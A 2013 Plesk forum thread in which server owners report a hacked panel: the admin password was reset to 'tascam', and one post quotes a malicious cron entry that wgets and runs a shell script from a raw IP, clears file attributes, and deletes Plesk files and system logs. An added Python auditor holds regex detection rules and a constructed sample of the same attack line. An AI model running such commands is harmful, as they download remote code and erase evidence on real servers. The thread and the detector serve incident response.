
Some psa cronjob failed, and everything is screwed up

Discussion in 'Plesk 9.x for Linux Suggestions and Feedback' started by matteosistisette, Jan 15, 2013.

  1. matteosistisette

    matteosistisette New Pleskian

    I got this email with the output of some cronjob executing some of Plesk's broken scripts, and it's full of errors:

    Cron <root@ks3094309> cd /tmp;wget http://128.173.237.127:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/cron;rm -Rf /var/log/secure;rm -Rf /var/log/lastlog;rm -Rf /var/log/auth.log;cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php;mv old.php agenti.php;mv Agent.php agenti.php

    Starting from then, I cannot log in to Plesk anymore. It says incorrect login or password, but I definitely have NOT forgotten my password.

    I would open a support ticket but since I cannot even log into Plesk I cannot retrieve my license number which I OBVIOUSLY don't remember.

    Some broken script of Plesk seems to have f***ed up everything.
    Please somebody from Parallels help.
     
    Last edited: Jan 15, 2013
  2. matteosistisette

    matteosistisette New Pleskian

    Turns out the password had been reset to "tascam" (a value I certainly never set).
    (I found out by looking at /etc/psa/.psa.shadow.)

    So I logged in, changed the password, and tried to submit a support ticket.

    But I'm told you have exceeded the support period and have to pay to get support. On a bug in the software of which you are already paying a license. Makes perfect sense.
     
  3. IgorG

    IgorG Forums Analyst Staff Member

    We have answered your question to bugreport@
    Please check it.
     
  4. altcomLimited

    altcomLimited New Pleskian

    Same problem with our server

    Hello,

    Could you explain exactly what has happened here, as one of our servers has had exactly the same problem (Plesk 9.0.1). The password had also been reset to 'tascam'. Has the server been hacked? We couldn't find anything suspicious but we obviously want to know how it has happened. That two servers both had their passwords changed to the same value around the same time seems incredibly unlikely except by design.

    Cheers, Neil
     
  5. ThomasPa

    ThomasPa New Pleskian

    Same Problem

    Got the same problem on our server. It seems to be hacked, password has also been changed to "tascam". I changed my root password and can access the server as usual. Since the pass has been changed, I get the following message from the root server every minute:

    --2013-01-22 10:15:01-- http://128.173.237.127:8080/browser/browser/backup.sh
    Connecting to 128.173.237.127:8080... connected.
    HTTP request sent, awaiting response... 404 /browser/browser/backup.sh
    2013-01-22 10:15:02 ERROR 404: /browser/browser/backup.sh.

    chmod: invalid mode: `x'
    Try `chmod --help' for more information.
    sh: /tmp/backup.sh.sh: No such file or directory
    chattr: No such file or directory while trying to stat /usr/local/psa/admin/htdocs/enterprise/control/control.php

    chattr: No such file or directory while trying to stat /usr/local/psa/admin/htdocs/enterprise/control/index.jsp

    mv: cannot stat `agent.php': No such file or directory
    mv: cannot stat `old.php': No such file or directory
    mv: cannot stat `Agent.php': No such file or directory

    We are currently evaluating the whole thing. Does anybody know, how the hack has been performed and what the script did on our server? Any hints what we shall be aware of?
     
  6. IgorG

    IgorG Forums Analyst Staff Member

    There was the following reply to matteosistisette:

    The script you've provided is not a Plesk cronjob.
    Instead it looks like a kind of malware.
    I suggest you check that all Plesk microupdates are installed on the server (should be 9.5.4 MU#27): http://kb.parallels.com/9294
    Keep your OS up to date.
    Check the server with antivirus/rootkit hunter software.
    Analyze cronjobs and remove all suspicious ones.
    Change passwords.
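
Added example, not part of the original thread or of any poster's reply: a small auditor for the "analyze cronjobs" step that flags crontab lines showing the traits of the entry quoted in the first post (HTTP download, raw-IP URL, running a script from /tmp, deleting logs, clearing file attributes with chattr). The rule names, the sample lines and the 192.0.2.10 address are constructed for illustration.

```python
import glob
import re

# Indicators taken from the cron entry quoted in this thread; the rule names
# are this example's own.
RULES = {
    "download": re.compile(r"\b(wget|curl)\b[^;|&]*\bhttps?://", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}\b"),
    "runs_from_tmp": re.compile(r"\b(sh|bash)\s+(-\w+\s+)*(/var)?/tmp/\S+"),
    "deletes_logs": re.compile(r"\brm\s+(-\w+\s+)*\S*/logs?/"),
    "chattr_unlock": re.compile(r"\bchattr\s+-\w+"),
}

# Common crontab locations on Linux (Red Hat and Debian layouts).
CRON_GLOBS = ["/etc/crontab", "/etc/cron.d/*", "/var/spool/cron/*",
              "/var/spool/cron/crontabs/*"]

# Constructed sample modelled on the entry in the first post; the address is a
# documentation placeholder and the paths are made up.
SAMPLE = [
    "# constructed sample crontab",
    "MAILTO=root",
    "10 3 * * * /usr/local/bin/nightly-backup.sh >/dev/null 2>&1",
    "* * * * * cd /tmp;wget http://192.0.2.10:8080/x/backup1.sh;chmod x backup1.sh;"
    "sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;rm -Rf /var/log/secure;"
    "chattr -ASacdijsu /srv/example/control.php",
    "0 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf",
]

def audit_cron_lines(lines):
    """Return [(line_number, [rule names])] for lines matching any rule,
    lines with the most indicators first."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # comments and blank lines are never executed
        hits = sorted(name for name, rx in RULES.items() if rx.search(line))
        if hits:
            findings.append((lineno, hits))
    return sorted(findings, key=lambda f: -len(f[1]))

if __name__ == "__main__":
    # Run as root so per-user spool files are readable.
    for path in sorted(p for g in CRON_GLOBS for p in glob.glob(g)):
        try:
            with open(path, errors="replace") as fh:
                for lineno, hits in audit_cron_lines(fh):
                    print(f"{path}:{lineno}: {', '.join(hits)}")
        except (IsADirectoryError, PermissionError):
            continue
```

A single indicator such as `download` also appears in legitimate jobs; lines that combine several are the ones to review first.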
     
  7. Steve242

    Steve242 New Pleskian

    Same problem with password reset

    We've noticed the same problem with the admin password being reset to 'tascam' (not by us). This seems to coincide with an auto update of Plesk to 9.0.1. Anyone got any more details on why that's happening?
     
  8. IgorG

    IgorG Forums Analyst Staff Member

  9. tillathenun

    tillathenun New Pleskian

    Same here

    I had the password changed to tascam as well. The user had also been changed to 'test'.

    To be honest, I found Parallels' page on how to fix it pretty complicated and not at all simple if you're an SSH newbie like me - the link below helped massively when trying to get Plesk back online so I could at least start changing passwords etc.

    http://wpguru.co.uk/2010/07/when-plesk-fails-to-upgrade/
     